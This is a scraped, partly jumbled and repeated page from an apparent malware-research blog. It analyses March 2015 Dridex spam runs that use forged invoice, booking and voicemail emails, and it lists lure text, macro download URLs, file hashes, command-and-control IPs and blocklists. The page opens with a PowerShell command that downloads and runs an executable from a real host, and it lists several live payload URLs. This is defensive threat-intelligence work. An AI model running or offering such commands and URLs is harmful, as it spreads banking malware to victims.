cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\huiUGI8t8dsF.cab'); expand %TEMP%\huiUGI8t8dsF.cab %TEMP%\huiUGI8t8dsF.exe; start %TEMP%\huiUGI8t8dsF.exe;Although the EXE file from 176.31.28.244 (OVH, France / Bitweb LLC, Russia) is downloaded as a CAB file and then EXPANDed to an EXE, there is in fact no file transformation happening at all (which is odd). This executable has a detection rate of 2/57.
This Malwr report shows it downloading a DLL with an MD5 of a40e588e614e6a4c9253d261275288bf [VT 4/57] which is the same payload as found in this earlier spam run, along with another executable with an MD5 of 409397f092d3407f95be42903172cf06 which is not in the VirusTotal database. The report also shows the malware phoning home to the following IPs:
31.25.77.154 (Call U Communications, Palestine)
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
188.165.5.194 (OVH, Ireland)
188.165.26.237 (OVH, Latvia)
115.241.60.56 (Reliance Communication, India)
46.19.143.151 (Private Layer INC, Switzerland)
Recommended blocklist:
31.25.77.154
95.163.121.0/24
188.165.5.194
188.165.26.237
115.241.60.56
46.19.143.151
176.31.28.244
Malware spam: "Confirmation of Booking" / "NWN Media Ltd" / "Della Richardson"
This spam is not from NWN Media Ltd but is instead a simple forgery sent out to random email addresses with a malicious attachment. NWN Media are not responsible for this spam, nor have their systems been compromised.
http://pmmarkt.de/js/bin.exe
http://deosiibude.de/deosiibude.de/js/bin.exe
These are saved as %TEMP%\zakilom86.exe and %TEMP%\Pikadlo64.exe respectively. The binaries are actually identical and have a VirusTotal detection rate of 5/57. According to the Malwr report this binary attempts to communicate with the following IPs:
31.41.45.211 (Relink Ltd, Russaia)
109.234.159.250 (Selectel Ltd, Russia)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud / IT House, Russia)
95.163.121.200 (Digital Networks CSJC aka DINETHOSTING / Russia)
It then drops what appears to be another version of itself called edg1.exe onto the target system [VT 2/55] along with a malicious Dridex DLL [VT 3/55]
Recommended blocklist:
31.41.45.211
109.234.159.250
37.59.50.19
62.76.179.44
95.163.121.0/24
From: della.richards2124@nwn.co.uk [della.richards@nwn.co.uk]Attached is a file NWN Confirmation Letter.doc which I have so far seen in two different versions, both with low detection rates [1] [2] which contain slightly different malicious macros [1] [2] which then go and download a malicious binary from one of the following locations:
Date: 18 March 2015 at 08:34
Subject: Confirmation of Booking
This booking confirmation forms a binding contract between yourselves and NWN Media Ltd.
If you do not agree with any of the details above then please contact the named sales representative on the above number immediately.
Yours sincerely,
Della
NWN Media Ltd
http://pmmarkt.de/js/bin.exe
http://deosiibude.de/deosiibude.de/js/bin.exe
These are saved as %TEMP%\zakilom86.exe and %TEMP%\Pikadlo64.exe respectively. The binaries are actually identical and have a VirusTotal detection rate of 5/57. According to the Malwr report this binary attempts to communicate with the following IPs:
31.41.45.211 (Relink Ltd, Russaia)
109.234.159.250 (Selectel Ltd, Russia)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud / IT House, Russia)
95.163.121.200 (Digital Networks CSJC aka DINETHOSTING / Russia)
It then drops what appears to be another version of itself called edg1.exe onto the target system [VT 2/55] along with a malicious Dridex DLL [VT 3/55]
Recommended blocklist:
31.41.45.211
109.234.159.250
37.59.50.19
62.76.179.44
95.163.121.0/24
Saturday, 14 March 2015
Quttera fails and spews false positives everywhere
By chance, I found out that my blog had been blacklisted by Quttera. No big deal, because it happens from time-to-time due to the nature of the content on the site. But I discovered that it isn't just my blog, but Quttera also block industry-leading sites such as Cisco, VMWare, Sophos, MITRE, AVG and Phishtank.
For example, at the time of writing the following domains are all blacklisted by Quttera (clicking the link shows the current blacklisting status):
www.cisco.com
www.vmware.com
cve.mitre.org
www.auscert.org.au
www.phishtank.com
www.buzzfeed.com
www.reddit.com
dl.dropbox.com
www.avg.com
www.malekal.com
nakedsecurity.sophos.com
blog.dynamoo.com
malware-traffic-analysis.net
blog.malwaremustdie.org
Cisco's blacklisting entry looks like this:
Now, you can ask Quttera to unblacklist your site for free by raising a ticket but the most prominent link leads to a paid service for £60/year. Hmmm.
I don't think that I will rush to subscribe to that. Obviously, something is seriously wrong with the algorithm in use, some of these sites should obviously be whitelisted. Quttera also doesn't understand the different between a malicious domain or IP being mentioned and such a site being linked to or injected into a site.
I guess there are many, many more domains that are in a similar situation. Perhaps you might want to check your own web properties and share your findings in the comments?
For example, at the time of writing the following domains are all blacklisted by Quttera (clicking the link shows the current blacklisting status):
www.cisco.com
www.vmware.com
cve.mitre.org
www.auscert.org.au
www.phishtank.com
www.buzzfeed.com
www.reddit.com
dl.dropbox.com
www.avg.com
www.malekal.com
nakedsecurity.sophos.com
blog.dynamoo.com
malware-traffic-analysis.net
blog.malwaremustdie.org
Cisco's blacklisting entry looks like this:
Now, you can ask Quttera to unblacklist your site for free by raising a ticket but the most prominent link leads to a paid service for £60/year. Hmmm.
I don't think that I will rush to subscribe to that. Obviously, something is seriously wrong with the algorithm in use, some of these sites should obviously be whitelisted. Quttera also doesn't understand the different between a malicious domain or IP being mentioned and such a site being linked to or injected into a site.
I guess there are many, many more domains that are in a similar situation. Perhaps you might want to check your own web properties and share your findings in the comments?
Labels:
Fail,
False Positive
Friday, 13 March 2015
Malware spam: "Invoice (13\03\2015) for payment to COMPANY NAME"
There is a series of malware spams in progress in the following format:
Invoice (13\03\2015) for payment to JUPITER PRIMADONA GROWTH TRUST
Invoice (13\03\2015) for payment to CARD FACTORY PLC
Invoice (13\03\2015) for payment to CELTIC
Invoice (13\03\2015) for payment to MIRADA PLC
Note the use of the backslash in the date. There is an attachment in the format 1234XYZ.doc which I have seen three different variants of (although one of those was zero length), one of which was used in this spam run yesterday and one new one with zero detections which contains this malicious macro, which downloads another component from:
http://95.163.121.186/api/gbb1.exe
This is saved as %TEMP%\GHjkdfg.exe - incidentally, this server is wide open and is full of data and binaries relating to the Dridex campaign. Unsurprisingly, it is hosted on a Digital Networks CJSC aka DINETHOSTING IP address. This binary has a detection rate of 3/53 and the Malwr report shows it phoning home to 95.163.121.33 which is also in the same network neighbourhood.
The binary also drops a malicious Dridex DLL with a detection rate of 5/56. This is the same DLL as used in this spam run earlier today.
Recommended blocklist:
95.163.121.0/24
Invoice (13\03\2015) for payment to JUPITER PRIMADONA GROWTH TRUST
Invoice (13\03\2015) for payment to CARD FACTORY PLC
Invoice (13\03\2015) for payment to CELTIC
Invoice (13\03\2015) for payment to MIRADA PLC
Note the use of the backslash in the date. There is an attachment in the format 1234XYZ.doc which I have seen three different variants of (although one of those was zero length), one of which was used in this spam run yesterday and one new one with zero detections which contains this malicious macro, which downloads another component from:
http://95.163.121.186/api/gbb1.exe
This is saved as %TEMP%\GHjkdfg.exe - incidentally, this server is wide open and is full of data and binaries relating to the Dridex campaign. Unsurprisingly, it is hosted on a Digital Networks CJSC aka DINETHOSTING IP address. This binary has a detection rate of 3/53 and the Malwr report shows it phoning home to 95.163.121.33 which is also in the same network neighbourhood.
The binary also drops a malicious Dridex DLL with a detection rate of 5/56. This is the same DLL as used in this spam run earlier today.
Recommended blocklist:
95.163.121.0/24
Malware spam: "pentafoods.com" / "Invoice: 2262004"
This fake Penta Foods spam run is another variant of this and it comes with a malicious attachment. Penta Foods are not sending this email, instead it is a simple forgery.
Attached is a Word document R-1179776.doc which actually comes in two version, both with zero detection rates, contains one of two malicious macros [1] [2] which then download a component from the following locations:
http://accalamh.aspone.cz/js/bin.exe
http://awbrs.com.au/js/bin.exe
This is saved as %TEMP%\fJChjfgD675eDTU.exe and has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] show a phone-home attempt to:
62.76.179.44 (Clodo-Cloud / IT House, Russia)
My sources also indicate that it phones home to:
212.69.172.187 (Webagentur, Austria)
78.129.153.12 (iomart / RapidSwitch, UK)
According to this Malwr report it also drops a DLL with a detection rate of just 2/57 which is probably Dridex.
Recommended blocklist:
62.76.179.44
212.69.172.187
78.129.153.12
From: cc18923@pentafoods.com
Date: 13 March 2015 at 07:50
Subject: Invoice: 2262004
Please find attached invoice : 2262004
Any queries please contact us.
--
Automated mail message produced by DbMail.
Registered to Penta Foods, License MBA2009357.
Attached is a Word document R-1179776.doc which actually comes in two version, both with zero detection rates, contains one of two malicious macros [1] [2] which then download a component from the following locations:
http://accalamh.aspone.cz/js/bin.exe
http://awbrs.com.au/js/bin.exe
This is saved as %TEMP%\fJChjfgD675eDTU.exe and has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] show a phone-home attempt to:
62.76.179.44 (Clodo-Cloud / IT House, Russia)
My sources also indicate that it phones home to:
212.69.172.187 (Webagentur, Austria)
78.129.153.12 (iomart / RapidSwitch, UK)
According to this Malwr report it also drops a DLL with a detection rate of just 2/57 which is probably Dridex.
Recommended blocklist:
62.76.179.44
212.69.172.187
78.129.153.12
Thursday, 12 March 2015
Malware spam: "Invoice [1234XYZ] for payment to COMPANY NAME"
These rather terse emails appear to refer to various companies, and all come with a malicious attachment:
The attachment is a Word document with a name that matches the reference in the subject. So far, I have seen two different versions of this with low detection rates [1] [2] which contain these malicious macros [1] [2] [pastebin] which contain some quite entertaining obfuscation, but when deobfuscated try to download an additional component from the following locations:
https://92.63.88.102/api/gb1.exe
https://85.143.166.124/api/gb1.exe
Note the use of HTTPS. Those two IP addresses belong to:
92.63.88.102 (MWTV, Latvia)
85.143.166.124 (Pirix, Russia)
Both are well-known hosts for this sort of rubbish. According to the Malwr report this attempts to phone home to:
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
Digital Networks is also a sea of crap. It also drops a Dridex DLL with a detection rate of 9/57.
Recommended blocklist:
95.163.121.0/24
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
85.143.166.0/24
From: Erasmo Small
Date: 12 March 2015 at 09:40
Subject: Invoice [3479XZM] for payment to INCOME & GROWTH VCT PLC(THE)
From: Eli Ramirez
Date: 12 March 2015 at 08:37
Subject: Invoice [4053FJK] for payment to RANDGOLD RESOURCES
From: Richard Baxter
Date: 12 March 2015 at 08:37
Subject: Invoice [3020JQM] for payment to TARSUS GROUP PLC
From: Megan Dennis
Date: 12 March 2015 at 09:36
Subject: Invoice [4706CEZ] for payment to SHANKS GROUP
The attachment is a Word document with a name that matches the reference in the subject. So far, I have seen two different versions of this with low detection rates [1] [2] which contain these malicious macros [1] [2] [pastebin] which contain some quite entertaining obfuscation, but when deobfuscated try to download an additional component from the following locations:
https://92.63.88.102/api/gb1.exe
https://85.143.166.124/api/gb1.exe
Note the use of HTTPS. Those two IP addresses belong to:
92.63.88.102 (MWTV, Latvia)
85.143.166.124 (Pirix, Russia)
Both are well-known hosts for this sort of rubbish. According to the Malwr report this attempts to phone home to:
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
Digital Networks is also a sea of crap. It also drops a Dridex DLL with a detection rate of 9/57.
Recommended blocklist:
95.163.121.0/24
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
85.143.166.0/24
Wednesday, 11 March 2015
Malware spam: "Voicemail Message (07813297716) From:07813297716"
When was the last time someone sent you a voice mail message by email? Never? There are no surprises to find that this spam email message has a malicious attachment.
http://wqg64j0ei.homepage.t-online.de/data/log.exe
http://cosmeticvet.su/conlib.php
This behaviour is very much like a Dridex downloader, a campaign that has mostly been using malicous macros rather than EXE-in-ZIP attacks.
The executable it drops has a detection rate of 2/54 and these Malwr reports [1] [2] show a further component download from:
http://muscleshop15.ru/js/jre.exe
http://test1.thienduongweb.com/js/jre.exe
This component has a detection rate of 5/57. According to the Malwr report for that we see (among other things) that it drops a DLL with a detection rate of 4/57 which is the same Dridex binary we've been seeing all day.
Piecing together the IP addresses found in those reports combined with some information from one of my intelligence feeds, we can see that the following IPs are involved in this activity:
31.41.45.211 (Relink Ltd, Russia)
62.213.67.115 (Caravan Telecom, Russia)
80.150.6.138 (Deutsche Telekom, Germany)
42.117.1.88 (FPT Telecom Company, Vietnam)
188.225.77.242 (TimeWeb Co. Ltd., Russia)
212.224.113.144 (First Colo GmbH, Germany)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud, Russia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
185.25.150.33 (NetDC.pl, Poland)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)
Recommended blocklist:
31.41.45.211
62.213.67.115
80.150.6.138
42.117.1.88
188.225.77.242
212.224.113.144
37.59.50.19
62.76.179.44
95.163.121.0/24
185.25.150.3
104.232.32.119
188.120.243.159
From: Voicemail admin@victimdomainThe attachment is a ZIP file containing a malicious EXE file called MSG00311.WAV.exe which has a VirusTotal detection rate of 5/57. According to the Malwr report, it pulls down another executable and some config files from:
Date: 11/03/2015 11:48
Subject: Voicemail Message (07813297716) From:07813297716
IP Office Voicemail redirected message
Attachment: MSG00311.WAV.ZIP
http://wqg64j0ei.homepage.t-online.de/data/log.exe
http://cosmeticvet.su/conlib.php
This behaviour is very much like a Dridex downloader, a campaign that has mostly been using malicous macros rather than EXE-in-ZIP attacks.
The executable it drops has a detection rate of 2/54 and these Malwr reports [1] [2] show a further component download from:
http://muscleshop15.ru/js/jre.exe
http://test1.thienduongweb.com/js/jre.exe
This component has a detection rate of 5/57. According to the Malwr report for that we see (among other things) that it drops a DLL with a detection rate of 4/57 which is the same Dridex binary we've been seeing all day.
Piecing together the IP addresses found in those reports combined with some information from one of my intelligence feeds, we can see that the following IPs are involved in this activity:
31.41.45.211 (Relink Ltd, Russia)
62.213.67.115 (Caravan Telecom, Russia)
80.150.6.138 (Deutsche Telekom, Germany)
42.117.1.88 (FPT Telecom Company, Vietnam)
188.225.77.242 (TimeWeb Co. Ltd., Russia)
212.224.113.144 (First Colo GmbH, Germany)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud, Russia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
185.25.150.33 (NetDC.pl, Poland)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)
Recommended blocklist:
31.41.45.211
62.213.67.115
80.150.6.138
42.117.1.88
188.225.77.242
212.224.113.144
37.59.50.19
62.76.179.44
95.163.121.0/24
185.25.150.3
104.232.32.119
188.120.243.159
Labels:
DINETHOSTING,
Dridex,
EXE-in-ZIP,
France,
Malware,
OVH,
Poland,
Russia,
Spam,
TheFirst-RU,
Viruses,
Voice Mail
Malware spam: Message from "RNP0026735991E2" / "inv.09.03"
This pair of spam emails are closely related and have a malicious attachment:
Neither XLS attachment is currently detected by AV vendors [1] [2] and they contain two related but slightly different macros [1] [2] which download a component from the following locations:
http://koschudu.homepage.t-online.de/js/bin.exe
http://03404eb.netsolhost.com/js/bin.exe
The file is then saved as %TEMP%\fJChjfgD675eDTU.exe which has a VirusTotal detection rate of 3/57. According to this Malwr report, it attempts to connect to the following IPs:
188.225.77.216 (TimeWeb Co. Ltd, Russia)
42.117.1.88 (FPT Telecom Company, Vietnam)
31.41.45.211 (Relink Ltd, Russia)
87.236.215.103 (OneGbits, Lithuania)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)
It also drops a couple more malicious binaries with the following MD5s:
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
53ba28120a193e53fa09b057cc1cbfa2 [VT 4/57]
Recommended blocklist:
188.225.77.216
42.117.1.88
31.41.45.211
87.236.215.103
104.232.32.119
188.120.243.159
From: admin.scanner@victimdomain
Date: 11 March 2015 at 08:49
Subject: Message from "RNP0026735991E2"
This E-mail was sent from "RNP0026735991E2" (MP C305).
Scan Date: 11.03.2015 08:57:25 (+0100)
Queries to: admin.scanner@victimdomain
Attachment: 201503071457.xls
----------
From: Jora Service [jora.service@yahoo.com]
Date: 11 March 2015 at 09:27
Subject: inv.09.03
Attachment: INV 86-09.03.2015.xls
Neither XLS attachment is currently detected by AV vendors [1] [2] and they contain two related but slightly different macros [1] [2] which download a component from the following locations:
http://koschudu.homepage.t-online.de/js/bin.exe
http://03404eb.netsolhost.com/js/bin.exe
The file is then saved as %TEMP%\fJChjfgD675eDTU.exe which has a VirusTotal detection rate of 3/57. According to this Malwr report, it attempts to connect to the following IPs:
188.225.77.216 (TimeWeb Co. Ltd, Russia)
42.117.1.88 (FPT Telecom Company, Vietnam)
31.41.45.211 (Relink Ltd, Russia)
87.236.215.103 (OneGbits, Lithuania)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)
It also drops a couple more malicious binaries with the following MD5s:
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
53ba28120a193e53fa09b057cc1cbfa2 [VT 4/57]
Recommended blocklist:
188.225.77.216
42.117.1.88
31.41.45.211
87.236.215.103
104.232.32.119
188.120.243.159
Subscribe to:
Posts (Atom)